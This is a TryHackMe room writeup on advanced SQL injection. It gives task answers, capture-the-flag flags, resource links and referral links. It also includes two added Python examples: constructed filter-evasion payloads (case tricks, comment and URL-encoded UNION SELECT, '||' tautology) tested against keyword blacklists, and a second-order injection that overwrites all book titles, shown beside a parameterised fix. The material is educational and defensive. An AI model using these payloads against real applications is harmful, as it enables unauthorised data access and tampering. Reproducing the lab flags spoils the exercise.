
Summary

The website content provides a comprehensive walkthrough for advanced SQL injection techniques, including practical examples, flags, and additional resources for further learning, as part of a TryHackMe room.

Abstract

The provided text is a detailed writeup of an advanced SQL injection room on TryHackMe, a popular cybersecurity learning platform. It covers various SQL injection methods such as in-band, out-of-band, error-based, union-based, boolean-based blind, and time-based blind SQL injection, as well as second-order SQL injection and filter evasion techniques. The writeup includes step-by-step guidance through tasks, questions, and answers, along with flags to be captured for successful completion. It also offers tips for tackling challenging tasks, emphasizes the importance of understanding the tools and concepts, and provides additional resources for a deeper dive into the topics. The room is free, but the author encourages users to consider premium access for more benefits and includes their referral link for discounts.

Opinions

  • The author believes in the value of hands-on practice, encouraging readers to attempt tasks on their own.
  • They suggest taking time to understand tools and concepts rather than rushing through tasks, indicating a preference for quality learning.
  • The inclusion of a referral link suggests the author values mutual benefits and community support, as users can earn credit through referrals.
  • By providing a mix of explanations, examples, and external resources, the author conveys a commitment to comprehensive education in cybersecurity.
  • The author's enthusiasm for the subject is evident, as they encourage readers to engage with the material and enjoy the learning process.

TryHackMe — Advanced SQL Injection — Writeup

Key points: SQLi | SQL injection | In-band SQLi | Out-of-band SQLi | Inferential SQLi | Error-Based SQLi | Union-Based SQLi | Boolean-Based Blind SQLi | Time-Based Blind SQLi | Second-order SQL injection | Filter evasion | Out-of-band SQL Injection | Automation techniques | Mitigation | Nmap | sqlmap. Advanced SQL Injection by awesome TryHackMe! 🎉

Hi all. First, a quick introduction. The room covered here is free. It is still worth considering a premium subscription; more info here: https://tryhackme.com/why-subscribe

My referral link 🎁 (“When someone uses your referral link to sign up for a premium membership within 7 days, you both earn $5 credit towards premium access!”): https://tryhackme.com/signup?referrer=655bf0dd7cb6fa588c31d1a3 “It’s a win-win for you and your friends!” 🚀

To get more familiar with these topics, please visit the room at https://tryhackme.com/r/room/advancedsqlinjection for the full details. ✨ I encourage you to do the tasks on your own.

The tasks are well prepared, so I will try not to repeat their content. Everything you need is in the room; here I want to share some additional helpful resources.

Tip: if you get stuck on a task, take your time and don't hurry. Get more familiar with the tools mentioned, retrace your steps, and so on.

Task 1 — Introduction

nmap result, source: THM — Advanced SQL Injection

Q: What is the port on which MySQL service is running? A: 3306

Get ready! 🚀

Additional sources: https://www.mysql.com https://dev.mysql.com/doc/mysql-port-reference/en/mysql-port-reference-tables.html https://capec.mitre.org/data/definitions/66.html https://cwe.mitre.org/data/definitions/89.html

Task 2 — Quick Recap

Q: What type of SQL injection uses the same communication channel for both the injection and data retrieval? A: In-band

Q: In out-of-band SQL injection, which protocol is usually used to send query results to the attacker’s server? A: HTTP

Additional sources: https://www.geeksforgeeks.org/types-of-sql-injection-sqli/ https://owasp.org/www-community/attacks/SQL_Injection https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF

Task 3 — Second-Order SQL Injection

Flag, source: THM — Advanced SQL Injection

🚩 Flag

Q: What is the flag value after updating the title of all books to “compromised”? A: THM{SO_HACKED}

🚩 Flag

Q: What is the flag value once you drop the table hello from the database? A: THM{Table_Dropped}

Additional sources: https://portswigger.net/kb/issues/00100210_sql-injection-second-order

Task 4 — Filter Evasion Techniques

Q: What is the MySQL error code once an invalid query is entered with bad characters? A: 1064

Q: What is the name of the book where book ID=6? A: Animal Series

Additional sources: https://portswigger.net/support/sql-injection-bypassing-common-filters

Task 5 — Filter Evasion Techniques (continued)

Q: What is the password for the username “attacker”? A: tesla

Q: Which of the following can be used if the SELECT keyword is banned? Write the correct option only. a) SElect b) SeLect c) Both a and b d) We cannot bypass SELECT keyword filter A: c
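The Task 5 answer (both SElect and SeLect get past a ban on SELECT) generalises: a keyword blacklist is only as good as the normalisation in front of it. The Python below is an added example, not code from the room or from TryHackMe; the three filters and the payloads are constructed here to show what each rung of a blacklist still lets through. It goes a little beyond the task: besides case variation it tries inline comments, MySQL versioned comments (`/*!50000...*/`), URL encoding, and a payload that contains no keyword at all.

```python
"""Keyword blacklists versus filter evasion (constructed example, not code
from the TryHackMe room). Each filter returns True when it BLOCKS a payload."""
import re
import urllib.parse

BANNED = ("select", "union", "or", "and", "sleep", "benchmark")


def naive_filter(payload: str) -> bool:
    """Rung 1: case-sensitive substring match on the upper-case spelling.
    Blocks 'SELECT' (and the legitimate word 'FORM', which contains 'OR'),
    but not 'SElect' or 'SeLect', which MySQL accepts just the same."""
    return any(word.upper() in payload for word in BANNED)


def spaced_filter(payload: str) -> bool:
    """Rung 2: case-insensitive, but only a keyword surrounded by spaces,
    so that 'Oregon' or 'Android' stop triggering false positives."""
    lowered = payload.lower()
    return any(f" {word} " in lowered for word in BANNED)


def regex_filter(payload: str) -> bool:
    """Rung 3: URL-decode, turn MySQL comments into whitespace, then match
    keywords on word boundaries. A versioned comment /*!50000SELECT*/ is
    executed by MySQL, so its body is kept rather than stripped."""
    decoded = urllib.parse.unquote(payload)
    decoded = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", decoded, flags=re.S)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    pattern = r"\b(" + "|".join(BANNED) + r")\b"
    return re.search(pattern, decoded, re.I) is not None


FILTERS = {"naive": naive_filter, "spaced": spaced_filter, "regex": regex_filter}

# Constructed payloads; each would be sent in place of a numeric book id.
PAYLOADS = {
    "case":      "1' uNiOn SElect user(),2-- -",
    "comments":  "1'/**/uNiOn/**/SElect/**/user(),2-- -",
    "urlenc":    "1'%20uNiOn%20SElect%20user(),2--%20-",
    "versioned": "1'/**/uNiOn/**//*!50000SElect*/user(),2-- -",
    "pipes":     "' || '1'='1",          # no keyword at all
}


def evades(payload: str) -> list[str]:
    """Names of the filters this payload gets past."""
    return [name for name, check in FILTERS.items() if not check(payload)]


def report() -> dict[str, list[str]]:
    """Payload name -> filters it evades, for every constructed payload."""
    return {name: evades(p) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, passed in report().items():
        print(f"{name:10s} evades: {', '.join(passed) or 'nothing'}")
```

The last payload matters most: `||` is logical OR in MySQL and MariaDB unless `PIPES_AS_CONCAT` is set, so a filter that catches every spelling of OR still lets the boolean condition through. Each rung also shows where the check runs: the spaced filter fails on the URL-encoded payload simply because it inspects the raw parameter before decoding. The defence the room ends with in Task 9, parameterised queries, is the only one that does not depend on guessing the attacker's spelling.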

Task 6 — Out-of-band SQL Injection

Q: What is the output of the @@version on the MySQL server? A: 10.4.24-MariaDB

Q: What is the value of @@basedir variable? A: C:/xampp/mysql

Additional sources: https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/ https://www.akamai.com/glossary/what-is-dns-data-exfiltration

Task 7 — Other Techniques

🚩 Flag

Q: What is the value of the flag field in the books table where book_id =1? A: THM{HELLO}

Q: What field is detected on the server side when extracting the user agent? A: User-Agent

Additional sources: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection https://portswigger.net/web-security/host-header https://en.wikipedia.org/wiki/HTTP_header_injection https://portswigger.net/web-security/host-header/exploiting https://portswigger.net/kb/issues/00100700_xml-injection https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection https://www.invicti.com/learn/json-injection/

Task 8 — Automation

Q: Does the dynamic nature of SQL queries assist a pentester in identifying SQL injection (yea/nay)? A: Nay

Additional sources: https://nmap.org/ https://github.com/nmap/ https://sqlmap.org/ https://github.com/sqlmapproject/sqlmap https://github.com/xxgrunge/sqlninja https://github.com/43622283/jsql-injection https://github.com/CiscoCXSecurity/bbqsql

Task 9 — Best Practices

Q: What command does MSSQL support to execute system commands? A: xp_cmdshell

Additional sources: https://owasp.org/www-project-code-review-guide/ https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
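Task 3's flag (every book title changed to "compromised") and Task 9's parameterisation advice are two halves of the same lesson, so one added example covers both. The Python below is mine, not code from the room or from TryHackMe; it uses the standard-library sqlite3 module and constructed sample data. The point of a second-order injection is that the first write is safe: the payload is stored verbatim by a parameterised INSERT and only fires later, when another feature trusts the stored value and concatenates it into a query. A logged User-Agent header (Task 7) reused in a later query has exactly the same shape.

```python
"""Second-order SQL injection and the parameterised fix (constructed
example using the sqlite3 standard library; not code from the room)."""
import sqlite3

# Constructed sample data: book_id, title, owner
SEED_BOOKS = [(1, "Dune", "alice"), (2, "Neuromancer", "bob"), (3, "Snow Crash", "alice")]

# Constructed payload. AND binds tighter than OR, so the vulnerable WHERE
# clause becomes (book_id = N AND owner = 'x') OR '1'='1', i.e. every row.
ATTACKER = "x' OR '1'='1"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT UNIQUE)")
    conn.execute("CREATE TABLE books (book_id INTEGER PRIMARY KEY, title TEXT, owner TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", SEED_BOOKS)
    return conn


def register(conn: sqlite3.Connection, username: str) -> int:
    """First use: parameterised, so it is NOT injectable. That is exactly why
    the payload survives intact in the database, waiting for a second use."""
    cur = conn.execute("INSERT INTO users (username) VALUES (?)", (username,))
    return cur.lastrowid


def _username_for(conn: sqlite3.Connection, user_id: int) -> str:
    row = conn.execute("SELECT username FROM users WHERE user_id = ?", (user_id,)).fetchone()
    return row[0]


def rename_book_vulnerable(conn: sqlite3.Connection, user_id: int, book_id: int, new_title: str) -> int:
    """Second use: the username 'came from the database', so the developer
    trusts it and builds the query by string formatting. Deliberately unsafe;
    returns the number of rows the UPDATE touched."""
    username = _username_for(conn, user_id)
    sql = (f"UPDATE books SET title = '{new_title}' "
           f"WHERE book_id = {int(book_id)} AND owner = '{username}'")
    return conn.execute(sql).rowcount


def rename_book_safe(conn: sqlite3.Connection, user_id: int, book_id: int, new_title: str) -> int:
    """Same feature, every value bound as a parameter regardless of where it
    came from. The stored payload is now just an odd username."""
    username = _username_for(conn, user_id)
    return conn.execute(
        "UPDATE books SET title = ? WHERE book_id = ? AND owner = ?",
        (new_title, book_id, username),
    ).rowcount


def titles(conn: sqlite3.Connection) -> list[str]:
    return [row[0] for row in conn.execute("SELECT title FROM books ORDER BY book_id")]


if __name__ == "__main__":
    conn = fresh_db()
    uid = register(conn, ATTACKER)
    hit = rename_book_vulnerable(conn, uid, 1, "compromised")
    print(f"vulnerable: {hit} rows updated -> {titles(conn)}")

    conn = fresh_db()
    uid = register(conn, ATTACKER)
    hit = rename_book_safe(conn, uid, 1, "compromised")
    print(f"safe:       {hit} rows updated -> {titles(conn)}")
```

Note that the safe version does not sanitise, escape or reject the stored username at all; it binds it as a parameter, so the database engine never parses it as SQL. That is the practical reading of the OWASP cheat sheets linked above: validation and encoding are for business rules and output, not for keeping data out of the query grammar, and "it came from our own database" is not a reason to skip parameterisation.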

If you want to support my work, you can also take a look here: https://referral.hackthebox.com/mz824lPHTB, thanks!

I hope you enjoy! 🍀

#SQLi #SQLinjection #In-bandSQLi #Out-of-bandSQLi #InferentialSQLi #Error-BasedSQLi #Union-BasedSQLi #Boolean-BasedBlindSQLi #Time-BasedBlindSQLi #Second-orderSQLinjection #FilterEvasion #Out-of-bandSQLinjection #AutomationTechniques #Mitigation #Nmap #sqlmap #writeup #hacking #ITsecurity #THM #TryHackMe

Best wishes,
